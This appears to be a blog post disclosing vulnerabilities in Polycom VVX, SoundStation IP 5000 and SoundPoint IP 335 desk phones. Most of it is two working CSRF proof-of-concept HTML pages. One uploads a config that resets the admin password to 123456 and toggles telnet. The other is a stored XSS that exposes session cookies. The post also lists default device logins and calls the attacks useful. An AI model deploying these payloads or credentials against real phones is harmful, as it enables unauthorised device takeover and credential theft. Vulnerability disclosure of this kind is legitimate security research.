Poly(com) VVX, Soundstation IP 5000, SoundPoint IP 335 Vulnerabilities

Phone Model VVX 311
Part Number 3111-48350-001 Rev:A
MAC Address X
IP Mode IPv4
IP Address X
UC Software Version 5.9.1.0615
Updater Version 5.9.7.12459

This gui seems to be similar or the same to the soundpoint, Most Post requests seem vulnerable to csrf.  I can just take out the cookie login/pass that is in each request and craft a csrf.  For example the following is a csrf example that changes the admin password and turns on telnet.  This works for the VVX model however the same csrf did not work for the soundstation and soundpoint.

<html>
  <!-- Polycom VVX 5.9.1.0615 CSRF - Changes Admin pass to 123456. Also turns telnet on, login Polycom/123456 -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/192.168.128.11\/form-submit\/Utilities\/configuration\/importFile", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------402251386101268401375671906");
        xhr.withCredentials = true;
        var body = "-----------------------------402251386101268401375671906\r\n" + 
          "Content-Disposition: form-data; name=\"myfile\"; filename=\"polycomtelnet.cfg\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\x3cdevice device.set=\"1\"\x3e\n" + 
          "\x3cauth device.auth.localAdminPassword.set=\"1\" device.auth.localAdminPassword=\"123456\"/\x3e\n" + 
          "\x3ctelnet diags.telnetd.enabled=\"0\"\x3e\x3c/telnet\x3e\n" + 
          "\r\n" + 
          "-----------------------------402251386101268401375671906--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>


This sends a file called polycomtelnet.cfg which basically looks like this.

<device device.set="1">
<auth device.auth.
<telnet diags.telnetd.enabled="0"></
Phone Model SoundStation IP 5000 & SoundPoint IP 335 (same firmware)
Part Number 3111-30900-001 Rev:H
MAC Address X
IP Address X
UC Software Version 4.0.14.1388
BootROM Software Version 5.0.14.0580

This is a Post Xss via csrf that both the newest firmware of soundstation and soundpoint are vulnerable to.  Given the simple Cookie: Authorization= having cookies exposed can make this easy to convert from base64.

<html>
  <!-- Post XSS via CSRF on Soundstation IP 5000 & SoundPoint IP 335 UC ver 4.0.14.1388  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.128.17/form-submit" method="POST">
      <input type="hidden" name="250:1" value=""><Script>alert(document.cookie)</Script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Most of these devices come with default logins: user/123 admin/456 . However if the company setting these up has changed them these csrf vulnerabilities could be useful.

Advertisement

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s